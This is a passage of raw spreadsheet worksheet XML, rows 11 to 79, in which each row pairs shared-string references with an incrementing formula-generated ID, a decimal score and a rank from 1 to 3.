        <v>9442718</v>
      </c>
      <c r="D11" t="s">
        <v>22</v>
      </c>
      <c r="E11">
        <v>23.01311111450195</v>
      </c>
      <c r="F11">
        <v>1</v>
      </c>
    </row>
    <row r="12" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A12" t="s">
        <v>20</v>
      </c>
      <c r="B12" t="s">
        <v>23</v>
      </c>
      <c r="C12">
        <f t="shared" si="0"/>
        <v>9443971</v>
      </c>
      <c r="D12" t="s">
        <v>24</v>
      </c>
      <c r="E12">
        <v>9.5975608825683594</v>
      </c>
      <c r="F12">
        <v>2</v>
      </c>
    </row>
    <row r="13" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A13" t="s">
        <v>25</v>
      </c>
      <c r="B13" t="s">
        <v>26</v>
      </c>
      <c r="C13">
        <f t="shared" si="0"/>
        <v>9445224</v>
      </c>
      <c r="D13" t="s">
        <v>27</v>
      </c>
      <c r="E13">
        <v>28.078010559082031</v>
      </c>
      <c r="F13">
        <v>1</v>
      </c>
    </row>
    <row r="14" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A14" t="s">
        <v>25</v>
      </c>
      <c r="B14" t="s">
        <v>26</v>
      </c>
      <c r="C14">
        <f t="shared" si="0"/>
        <v>9446477</v>
      </c>
      <c r="D14" t="s">
        <v>28</v>
      </c>
      <c r="E14">
        <v>17.0797233581543</v>
      </c>
      <c r="F14">
        <v>2</v>
      </c>
    </row>
    <row r="15" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A15" t="s">
        <v>29</v>
      </c>
      <c r="B15" t="s">
        <v>30</v>
      </c>
      <c r="C15">
        <f t="shared" si="0"/>
        <v>9447730</v>
      </c>
      <c r="D15" t="s">
        <v>31</v>
      </c>
      <c r="E15">
        <v>10.69242000579834</v>
      </c>
      <c r="F15">
        <v>1</v>
      </c>
    </row>
    <row r="16" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A16" t="s">
        <v>29</v>
      </c>
      <c r="B16" t="s">
        <v>30</v>
      </c>
      <c r="C16">
        <f t="shared" si="0"/>
        <v>9448983</v>
      </c>
      <c r="D16" t="s">
        <v>32</v>
      </c>
      <c r="E16">
        <v>6.7662649154663086</v>
      </c>
      <c r="F16">
        <v>2</v>
      </c>
    </row>
    <row r="17" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A17" t="s">
        <v>33</v>
      </c>
      <c r="B17" t="s">
        <v>34</v>
      </c>
      <c r="C17">
        <f t="shared" si="0"/>
        <v>9450236</v>
      </c>
      <c r="D17" t="s">
        <v>35</v>
      </c>
      <c r="E17">
        <v>18.932466506958011</v>
      </c>
      <c r="F17">
        <v>1</v>
      </c>
    </row>
    <row r="18" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A18" t="s">
        <v>33</v>
      </c>
      <c r="B18" t="s">
        <v>34</v>
      </c>
      <c r="C18">
        <f t="shared" si="0"/>
        <v>9451489</v>
      </c>
      <c r="D18" t="s">
        <v>36</v>
      </c>
      <c r="E18">
        <v>14.771379470825201</v>
      </c>
      <c r="F18">
        <v>2</v>
      </c>
    </row>
    <row r="19" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A19" t="s">
        <v>37</v>
      </c>
      <c r="B19" t="s">
        <v>38</v>
      </c>
      <c r="C19">
        <f t="shared" si="0"/>
        <v>9452742</v>
      </c>
      <c r="D19" t="s">
        <v>39</v>
      </c>
      <c r="E19">
        <v>29.887538909912109</v>
      </c>
      <c r="F19">
        <v>1</v>
      </c>
    </row>
    <row r="20" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A20" t="s">
        <v>37</v>
      </c>
      <c r="B20" t="s">
        <v>38</v>
      </c>
      <c r="C20">
        <f t="shared" si="0"/>
        <v>9453995</v>
      </c>
      <c r="D20" t="s">
        <v>40</v>
      </c>
      <c r="E20">
        <v>6.8494892120361328</v>
      </c>
      <c r="F20">
        <v>2</v>
      </c>
    </row>
    <row r="21" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A21" t="s">
        <v>41</v>
      </c>
      <c r="B21" t="s">
        <v>42</v>
      </c>
      <c r="C21">
        <f t="shared" si="0"/>
        <v>9455248</v>
      </c>
      <c r="D21" t="s">
        <v>43</v>
      </c>
      <c r="E21">
        <v>29.76505279541016</v>
      </c>
      <c r="F21">
        <v>1</v>
      </c>
    </row>
    <row r="22" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A22" t="s">
        <v>41</v>
      </c>
      <c r="B22" t="s">
        <v>42</v>
      </c>
      <c r="C22">
        <f t="shared" si="0"/>
        <v>9456501</v>
      </c>
      <c r="D22" t="s">
        <v>44</v>
      </c>
      <c r="E22">
        <v>7.7613286972045898</v>
      </c>
      <c r="F22">
        <v>2</v>
      </c>
    </row>
    <row r="23" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A23" t="s">
        <v>45</v>
      </c>
      <c r="B23" t="s">
        <v>46</v>
      </c>
      <c r="C23">
        <f t="shared" si="0"/>
        <v>9457754</v>
      </c>
      <c r="D23" t="s">
        <v>47</v>
      </c>
      <c r="E23">
        <v>36.993026733398438</v>
      </c>
      <c r="F23">
        <v>1</v>
      </c>
    </row>
    <row r="24" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A24" t="s">
        <v>45</v>
      </c>
      <c r="B24" t="s">
        <v>46</v>
      </c>
      <c r="C24">
        <f t="shared" si="0"/>
        <v>9459007</v>
      </c>
      <c r="D24" t="s">
        <v>48</v>
      </c>
      <c r="E24">
        <v>27.848789215087891</v>
      </c>
      <c r="F24">
        <v>2</v>
      </c>
    </row>
    <row r="25" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A25" t="s">
        <v>45</v>
      </c>
      <c r="B25" t="s">
        <v>46</v>
      </c>
      <c r="C25">
        <f t="shared" si="0"/>
        <v>9460260</v>
      </c>
      <c r="D25" t="s">
        <v>49</v>
      </c>
      <c r="E25">
        <v>7.7753214836120614</v>
      </c>
      <c r="F25">
        <v>3</v>
      </c>
    </row>
    <row r="26" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A26" t="s">
        <v>50</v>
      </c>
      <c r="B26" t="s">
        <v>51</v>
      </c>
      <c r="C26">
        <f t="shared" si="0"/>
        <v>9461513</v>
      </c>
      <c r="D26" t="s">
        <v>52</v>
      </c>
      <c r="E26">
        <v>31.712665557861332</v>
      </c>
      <c r="F26">
        <v>1</v>
      </c>
    </row>
    <row r="27" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A27" t="s">
        <v>50</v>
      </c>
      <c r="B27" t="s">
        <v>51</v>
      </c>
      <c r="C27">
        <f t="shared" si="0"/>
        <v>9462766</v>
      </c>
      <c r="D27" t="s">
        <v>53</v>
      </c>
      <c r="E27">
        <v>15.44124221801758</v>
      </c>
      <c r="F27">
        <v>2</v>
      </c>
    </row>
    <row r="28" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A28" t="s">
        <v>54</v>
      </c>
      <c r="B28" t="s">
        <v>55</v>
      </c>
      <c r="C28">
        <f t="shared" si="0"/>
        <v>9464019</v>
      </c>
      <c r="D28" t="s">
        <v>56</v>
      </c>
      <c r="E28">
        <v>38.130477905273438</v>
      </c>
      <c r="F28">
        <v>1</v>
      </c>
    </row>
    <row r="29" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A29" t="s">
        <v>54</v>
      </c>
      <c r="B29" t="s">
        <v>55</v>
      </c>
      <c r="C29">
        <f t="shared" si="0"/>
        <v>9465272</v>
      </c>
      <c r="D29" t="s">
        <v>57</v>
      </c>
      <c r="E29">
        <v>28.5848388671875</v>
      </c>
      <c r="F29">
        <v>2</v>
      </c>
    </row>
    <row r="30" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A30" t="s">
        <v>54</v>
      </c>
      <c r="B30" t="s">
        <v>55</v>
      </c>
      <c r="C30">
        <f t="shared" si="0"/>
        <v>9466525</v>
      </c>
      <c r="D30" t="s">
        <v>58</v>
      </c>
      <c r="E30">
        <v>8.0888322554528713E-4</v>
      </c>
      <c r="F30">
        <v>3</v>
      </c>
    </row>
    <row r="31" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A31" t="s">
        <v>59</v>
      </c>
      <c r="B31" t="s">
        <v>60</v>
      </c>
      <c r="C31">
        <f t="shared" si="0"/>
        <v>9467778</v>
      </c>
      <c r="D31" t="s">
        <v>61</v>
      </c>
      <c r="E31">
        <v>27.855228424072269</v>
      </c>
      <c r="F31">
        <v>1</v>
      </c>
    </row>
    <row r="32" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A32" t="s">
        <v>59</v>
      </c>
      <c r="B32" t="s">
        <v>60</v>
      </c>
      <c r="C32">
        <f t="shared" si="0"/>
        <v>9469031</v>
      </c>
      <c r="D32" t="s">
        <v>62</v>
      </c>
      <c r="E32">
        <v>8.5616416931152344</v>
      </c>
      <c r="F32">
        <v>2</v>
      </c>
    </row>
    <row r="33" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A33" t="s">
        <v>63</v>
      </c>
      <c r="B33" t="s">
        <v>64</v>
      </c>
      <c r="C33">
        <f t="shared" si="0"/>
        <v>9470284</v>
      </c>
      <c r="D33" t="s">
        <v>65</v>
      </c>
      <c r="E33">
        <v>36.686691284179688</v>
      </c>
      <c r="F33">
        <v>1</v>
      </c>
    </row>
    <row r="34" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A34" t="s">
        <v>63</v>
      </c>
      <c r="B34" t="s">
        <v>64</v>
      </c>
      <c r="C34">
        <f t="shared" si="0"/>
        <v>9471537</v>
      </c>
      <c r="D34" t="s">
        <v>66</v>
      </c>
      <c r="E34">
        <v>3.1020704773254693E-4</v>
      </c>
      <c r="F34">
        <v>2</v>
      </c>
    </row>
    <row r="35" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A35" t="s">
        <v>67</v>
      </c>
      <c r="B35" t="s">
        <v>68</v>
      </c>
      <c r="C35">
        <f t="shared" si="0"/>
        <v>9472790</v>
      </c>
      <c r="D35" t="s">
        <v>69</v>
      </c>
      <c r="E35">
        <v>20.99493408203125</v>
      </c>
      <c r="F35">
        <v>1</v>
      </c>
    </row>
    <row r="36" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A36" t="s">
        <v>67</v>
      </c>
      <c r="B36" t="s">
        <v>68</v>
      </c>
      <c r="C36">
        <f t="shared" si="0"/>
        <v>9474043</v>
      </c>
      <c r="D36" t="s">
        <v>70</v>
      </c>
      <c r="E36">
        <v>15.577529907226561</v>
      </c>
      <c r="F36">
        <v>2</v>
      </c>
    </row>
    <row r="37" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A37" t="s">
        <v>71</v>
      </c>
      <c r="B37" t="s">
        <v>72</v>
      </c>
      <c r="C37">
        <f t="shared" si="0"/>
        <v>9475296</v>
      </c>
      <c r="D37" t="s">
        <v>73</v>
      </c>
      <c r="E37">
        <v>32.064182281494141</v>
      </c>
      <c r="F37">
        <v>1</v>
      </c>
    </row>
    <row r="38" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A38" t="s">
        <v>71</v>
      </c>
      <c r="B38" t="s">
        <v>72</v>
      </c>
      <c r="C38">
        <f t="shared" si="0"/>
        <v>9476549</v>
      </c>
      <c r="D38" t="s">
        <v>74</v>
      </c>
      <c r="E38">
        <v>3.6275364458560937E-2</v>
      </c>
      <c r="F38">
        <v>2</v>
      </c>
    </row>
    <row r="39" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A39" t="s">
        <v>75</v>
      </c>
      <c r="B39" t="s">
        <v>76</v>
      </c>
      <c r="C39">
        <f t="shared" si="0"/>
        <v>9477802</v>
      </c>
      <c r="D39" t="s">
        <v>77</v>
      </c>
      <c r="E39">
        <v>23.46588134765625</v>
      </c>
      <c r="F39">
        <v>1</v>
      </c>
    </row>
    <row r="40" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A40" t="s">
        <v>75</v>
      </c>
      <c r="B40" t="s">
        <v>76</v>
      </c>
      <c r="C40">
        <f t="shared" si="0"/>
        <v>9479055</v>
      </c>
      <c r="D40" t="s">
        <v>78</v>
      </c>
      <c r="E40">
        <v>2.2534892559051509</v>
      </c>
      <c r="F40">
        <v>2</v>
      </c>
    </row>
    <row r="41" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A41" t="s">
        <v>79</v>
      </c>
      <c r="B41" t="s">
        <v>80</v>
      </c>
      <c r="C41">
        <f t="shared" si="0"/>
        <v>9480308</v>
      </c>
      <c r="D41" t="s">
        <v>81</v>
      </c>
      <c r="E41">
        <v>32.155590057373047</v>
      </c>
      <c r="F41">
        <v>1</v>
      </c>
    </row>
    <row r="42" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A42" t="s">
        <v>79</v>
      </c>
      <c r="B42" t="s">
        <v>80</v>
      </c>
      <c r="C42">
        <f t="shared" si="0"/>
        <v>9481561</v>
      </c>
      <c r="D42" t="s">
        <v>82</v>
      </c>
      <c r="E42">
        <v>3.948459386825562</v>
      </c>
      <c r="F42">
        <v>2</v>
      </c>
    </row>
    <row r="43" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A43" t="s">
        <v>83</v>
      </c>
      <c r="B43" t="s">
        <v>84</v>
      </c>
      <c r="C43">
        <f t="shared" si="0"/>
        <v>9482814</v>
      </c>
      <c r="D43" t="s">
        <v>85</v>
      </c>
      <c r="E43">
        <v>30.005615234375</v>
      </c>
      <c r="F43">
        <v>1</v>
      </c>
    </row>
    <row r="44" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A44" t="s">
        <v>83</v>
      </c>
      <c r="B44" t="s">
        <v>84</v>
      </c>
      <c r="C44">
        <f t="shared" si="0"/>
        <v>9484067</v>
      </c>
      <c r="D44" t="s">
        <v>86</v>
      </c>
      <c r="E44">
        <v>14.903605461120611</v>
      </c>
      <c r="F44">
        <v>2</v>
      </c>
    </row>
    <row r="45" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A45" t="s">
        <v>87</v>
      </c>
      <c r="B45" t="s">
        <v>88</v>
      </c>
      <c r="C45">
        <f t="shared" si="0"/>
        <v>9485320</v>
      </c>
      <c r="D45" t="s">
        <v>89</v>
      </c>
      <c r="E45">
        <v>26.887155532836911</v>
      </c>
      <c r="F45">
        <v>1</v>
      </c>
    </row>
    <row r="46" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A46" t="s">
        <v>87</v>
      </c>
      <c r="B46" t="s">
        <v>88</v>
      </c>
      <c r="C46">
        <f t="shared" si="0"/>
        <v>9486573</v>
      </c>
      <c r="D46" t="s">
        <v>90</v>
      </c>
      <c r="E46">
        <v>8.5098110139369965E-3</v>
      </c>
      <c r="F46">
        <v>2</v>
      </c>
    </row>
    <row r="47" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A47" t="s">
        <v>91</v>
      </c>
      <c r="B47" t="s">
        <v>92</v>
      </c>
      <c r="C47">
        <f t="shared" si="0"/>
        <v>9487826</v>
      </c>
      <c r="D47" t="s">
        <v>93</v>
      </c>
      <c r="E47">
        <v>30.354310989379879</v>
      </c>
      <c r="F47">
        <v>1</v>
      </c>
    </row>
    <row r="48" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A48" t="s">
        <v>91</v>
      </c>
      <c r="B48" t="s">
        <v>92</v>
      </c>
      <c r="C48">
        <f t="shared" si="0"/>
        <v>9489079</v>
      </c>
      <c r="D48" t="s">
        <v>94</v>
      </c>
      <c r="E48">
        <v>10.324793815612789</v>
      </c>
      <c r="F48">
        <v>2</v>
      </c>
    </row>
    <row r="49" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A49" t="s">
        <v>95</v>
      </c>
      <c r="B49" t="s">
        <v>96</v>
      </c>
      <c r="C49">
        <f t="shared" si="0"/>
        <v>9490332</v>
      </c>
      <c r="D49" t="s">
        <v>97</v>
      </c>
      <c r="E49">
        <v>24.888299942016602</v>
      </c>
      <c r="F49">
        <v>1</v>
      </c>
    </row>
    <row r="50" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A50" t="s">
        <v>95</v>
      </c>
      <c r="B50" t="s">
        <v>96</v>
      </c>
      <c r="C50">
        <f t="shared" si="0"/>
        <v>9491585</v>
      </c>
      <c r="D50" t="s">
        <v>98</v>
      </c>
      <c r="E50">
        <v>3.6198360919952388</v>
      </c>
      <c r="F50">
        <v>2</v>
      </c>
    </row>
    <row r="51" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A51" t="s">
        <v>99</v>
      </c>
      <c r="B51" t="s">
        <v>100</v>
      </c>
      <c r="C51">
        <f t="shared" si="0"/>
        <v>9492838</v>
      </c>
      <c r="D51" t="s">
        <v>101</v>
      </c>
      <c r="E51">
        <v>27.576234817504879</v>
      </c>
      <c r="F51">
        <v>1</v>
      </c>
    </row>
    <row r="52" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A52" t="s">
        <v>99</v>
      </c>
      <c r="B52" t="s">
        <v>100</v>
      </c>
      <c r="C52">
        <f t="shared" si="0"/>
        <v>9494091</v>
      </c>
      <c r="D52" t="s">
        <v>102</v>
      </c>
      <c r="E52">
        <v>0.21610954403877261</v>
      </c>
      <c r="F52">
        <v>2</v>
      </c>
    </row>
    <row r="53" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A53" t="s">
        <v>103</v>
      </c>
      <c r="B53" t="s">
        <v>104</v>
      </c>
      <c r="C53">
        <f t="shared" si="0"/>
        <v>9495344</v>
      </c>
      <c r="D53" t="s">
        <v>105</v>
      </c>
      <c r="E53">
        <v>28.099704742431641</v>
      </c>
      <c r="F53">
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A54" t="s">
        <v>103</v>
      </c>
      <c r="B54" t="s">
        <v>104</v>
      </c>
      <c r="C54">
        <f t="shared" si="0"/>
        <v>9496597</v>
      </c>
      <c r="D54" t="s">
        <v>106</v>
      </c>
      <c r="E54">
        <v>6.8273830413818359</v>
      </c>
      <c r="F54">
        <v>2</v>
      </c>
    </row>
    <row r="55" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A55" t="s">
        <v>107</v>
      </c>
      <c r="B55" t="s">
        <v>108</v>
      </c>
      <c r="C55">
        <f t="shared" si="0"/>
        <v>9497850</v>
      </c>
      <c r="D55" t="s">
        <v>109</v>
      </c>
      <c r="E55">
        <v>30.15286827087402</v>
      </c>
      <c r="F55">
        <v>1</v>
      </c>
    </row>
    <row r="56" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A56" t="s">
        <v>107</v>
      </c>
      <c r="B56" t="s">
        <v>108</v>
      </c>
      <c r="C56">
        <f t="shared" si="0"/>
        <v>9499103</v>
      </c>
      <c r="D56" t="s">
        <v>110</v>
      </c>
      <c r="E56">
        <v>1.751982781570405E-4</v>
      </c>
      <c r="F56">
        <v>2</v>
      </c>
    </row>
    <row r="57" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A57" t="s">
        <v>111</v>
      </c>
      <c r="B57" t="s">
        <v>112</v>
      </c>
      <c r="C57">
        <f t="shared" si="0"/>
        <v>9500356</v>
      </c>
      <c r="D57" t="s">
        <v>113</v>
      </c>
      <c r="E57">
        <v>24.77821159362793</v>
      </c>
      <c r="F57">
        <v>1</v>
      </c>
    </row>
    <row r="58" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A58" t="s">
        <v>111</v>
      </c>
      <c r="B58" t="s">
        <v>114</v>
      </c>
      <c r="C58">
        <f t="shared" si="0"/>
        <v>9501609</v>
      </c>
      <c r="D58" t="s">
        <v>115</v>
      </c>
      <c r="E58">
        <v>5.7987184524536133</v>
      </c>
      <c r="F58">
        <v>2</v>
      </c>
    </row>
    <row r="59" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A59" t="s">
        <v>116</v>
      </c>
      <c r="B59" t="s">
        <v>117</v>
      </c>
      <c r="C59">
        <f t="shared" si="0"/>
        <v>9502862</v>
      </c>
      <c r="D59" t="s">
        <v>118</v>
      </c>
      <c r="E59">
        <v>30.20207405090332</v>
      </c>
      <c r="F59">
        <v>1</v>
      </c>
    </row>
    <row r="60" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A60" t="s">
        <v>116</v>
      </c>
      <c r="B60" t="s">
        <v>117</v>
      </c>
      <c r="C60">
        <f t="shared" si="0"/>
        <v>9504115</v>
      </c>
      <c r="D60" t="s">
        <v>119</v>
      </c>
      <c r="E60">
        <v>11.40111255645752</v>
      </c>
      <c r="F60">
        <v>2</v>
      </c>
    </row>
    <row r="61" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A61" t="s">
        <v>120</v>
      </c>
      <c r="B61" t="s">
        <v>121</v>
      </c>
      <c r="C61">
        <f t="shared" si="0"/>
        <v>9505368</v>
      </c>
      <c r="D61" t="s">
        <v>122</v>
      </c>
      <c r="E61">
        <v>22.917549133300781</v>
      </c>
      <c r="F61">
        <v>1</v>
      </c>
    </row>
    <row r="62" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A62" t="s">
        <v>120</v>
      </c>
      <c r="B62" t="s">
        <v>121</v>
      </c>
      <c r="C62">
        <f t="shared" si="0"/>
        <v>9506621</v>
      </c>
      <c r="D62" t="s">
        <v>123</v>
      </c>
      <c r="E62">
        <v>2.365073680877686</v>
      </c>
      <c r="F62">
        <v>2</v>
      </c>
    </row>
    <row r="63" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A63" t="s">
        <v>124</v>
      </c>
      <c r="B63" t="s">
        <v>125</v>
      </c>
      <c r="C63">
        <f t="shared" si="0"/>
        <v>9507874</v>
      </c>
      <c r="D63" t="s">
        <v>126</v>
      </c>
      <c r="E63">
        <v>23.452852249145511</v>
      </c>
      <c r="F63">
        <v>1</v>
      </c>
    </row>
    <row r="64" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A64" t="s">
        <v>124</v>
      </c>
      <c r="B64" t="s">
        <v>125</v>
      </c>
      <c r="C64">
        <f t="shared" si="0"/>
        <v>9509127</v>
      </c>
      <c r="D64" t="s">
        <v>127</v>
      </c>
      <c r="E64">
        <v>1.0338619947433469</v>
      </c>
      <c r="F64">
        <v>2</v>
      </c>
    </row>
    <row r="65" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A65" t="s">
        <v>128</v>
      </c>
      <c r="B65" t="s">
        <v>129</v>
      </c>
      <c r="C65">
        <f t="shared" si="0"/>
        <v>9510380</v>
      </c>
      <c r="D65" t="s">
        <v>130</v>
      </c>
      <c r="E65">
        <v>22.770223617553711</v>
      </c>
      <c r="F65">
        <v>1</v>
      </c>
    </row>
    <row r="66" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A66" t="s">
        <v>128</v>
      </c>
      <c r="B66" t="s">
        <v>129</v>
      </c>
      <c r="C66">
        <f t="shared" si="0"/>
        <v>9511633</v>
      </c>
      <c r="D66" t="s">
        <v>131</v>
      </c>
      <c r="E66">
        <v>1.8181853294372561</v>
      </c>
      <c r="F66">
        <v>2</v>
      </c>
    </row>
    <row r="67" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A67" t="s">
        <v>132</v>
      </c>
      <c r="B67" t="s">
        <v>133</v>
      </c>
      <c r="C67">
        <f t="shared" si="0"/>
        <v>9512886</v>
      </c>
      <c r="D67" t="s">
        <v>134</v>
      </c>
      <c r="E67">
        <v>24.424312591552731</v>
      </c>
      <c r="F67">
        <v>1</v>
      </c>
    </row>
    <row r="68" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A68" t="s">
        <v>132</v>
      </c>
      <c r="B68" t="s">
        <v>133</v>
      </c>
      <c r="C68">
        <f t="shared" si="0"/>
        <v>9514139</v>
      </c>
      <c r="D68" t="s">
        <v>135</v>
      </c>
      <c r="E68">
        <v>13.69438552856445</v>
      </c>
      <c r="F68">
        <v>2</v>
      </c>
    </row>
    <row r="69" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A69" t="s">
        <v>136</v>
      </c>
      <c r="B69" t="s">
        <v>137</v>
      </c>
      <c r="C69">
        <f t="shared" si="0"/>
        <v>9515392</v>
      </c>
      <c r="D69" t="s">
        <v>138</v>
      </c>
      <c r="E69">
        <v>29.53615570068359</v>
      </c>
      <c r="F69">
        <v>1</v>
      </c>
    </row>
    <row r="70" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A70" t="s">
        <v>136</v>
      </c>
      <c r="B70" t="s">
        <v>137</v>
      </c>
      <c r="C70">
        <f t="shared" si="0"/>
        <v>9516645</v>
      </c>
      <c r="D70" t="s">
        <v>139</v>
      </c>
      <c r="E70">
        <v>12.564609527587891</v>
      </c>
      <c r="F70">
        <v>2</v>
      </c>
    </row>
    <row r="71" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A71" t="s">
        <v>140</v>
      </c>
      <c r="B71" t="s">
        <v>141</v>
      </c>
      <c r="C71">
        <f t="shared" si="0"/>
        <v>9517898</v>
      </c>
      <c r="D71" t="s">
        <v>142</v>
      </c>
      <c r="E71">
        <v>21.314554214477539</v>
      </c>
      <c r="F71">
        <v>1</v>
      </c>
    </row>
    <row r="72" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A72" t="s">
        <v>140</v>
      </c>
      <c r="B72" t="s">
        <v>141</v>
      </c>
      <c r="C72">
        <f t="shared" si="0"/>
        <v>9519151</v>
      </c>
      <c r="D72" t="s">
        <v>143</v>
      </c>
      <c r="E72">
        <v>17.637155532836911</v>
      </c>
      <c r="F72">
        <v>2</v>
      </c>
    </row>
    <row r="73" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A73" t="s">
        <v>144</v>
      </c>
      <c r="B73" t="s">
        <v>145</v>
      </c>
      <c r="C73">
        <f t="shared" si="0"/>
        <v>9520404</v>
      </c>
      <c r="D73" t="s">
        <v>146</v>
      </c>
      <c r="E73">
        <v>18.062698364257809</v>
      </c>
      <c r="F73">
        <v>1</v>
      </c>
    </row>
    <row r="74" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A74" t="s">
        <v>144</v>
      </c>
      <c r="B74" t="s">
        <v>145</v>
      </c>
      <c r="C74">
        <f t="shared" ref="C74:C137" si="1">C73+1253</f>
        <v>9521657</v>
      </c>
      <c r="D74" t="s">
        <v>147</v>
      </c>
      <c r="E74">
        <v>7.8422069549560547</v>
      </c>
      <c r="F74">
        <v>2</v>
      </c>
    </row>
    <row r="75" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A75" t="s">
        <v>148</v>
      </c>
      <c r="B75" t="s">
        <v>149</v>
      </c>
      <c r="C75">
        <f t="shared" si="1"/>
        <v>9522910</v>
      </c>
      <c r="D75" t="s">
        <v>150</v>
      </c>
      <c r="E75">
        <v>27.150249481201168</v>
      </c>
      <c r="F75">
        <v>1</v>
      </c>
    </row>
    <row r="76" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A76" t="s">
        <v>148</v>
      </c>
      <c r="B76" t="s">
        <v>149</v>
      </c>
      <c r="C76">
        <f t="shared" si="1"/>
        <v>9524163</v>
      </c>
      <c r="D76" t="s">
        <v>151</v>
      </c>
      <c r="E76">
        <v>1.461506128311157</v>
      </c>
      <c r="F76">
        <v>2</v>
      </c>
    </row>
    <row r="77" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A77" t="s">
        <v>152</v>
      </c>
      <c r="B77" t="s">
        <v>153</v>
      </c>
      <c r="C77">
        <f t="shared" si="1"/>
        <v>9525416</v>
      </c>
      <c r="D77" t="s">
        <v>154</v>
      </c>
      <c r="E77">
        <v>22.73194694519043</v>
      </c>
      <c r="F77">
        <v>1</v>
      </c>
    </row>
    <row r="78" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A78" t="s">
        <v>152</v>
      </c>
      <c r="B78" t="s">
        <v>153</v>
      </c>
      <c r="C78">
        <f t="shared" si="1"/>
        <v>9526669</v>
      </c>
      <c r="D78" t="s">
        <v>155</v>
      </c>
      <c r="E78">
        <v>8.7966413497924805</v>
      </c>
      <c r="F78">
        <v>2</v>
      </c>
    </row>
    <row r="79" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A79" t="s">
        <v>156</v>
      </c>
      <c r="B79" t="s">
        <v>157</v>
      </c>
      <c r="C79">
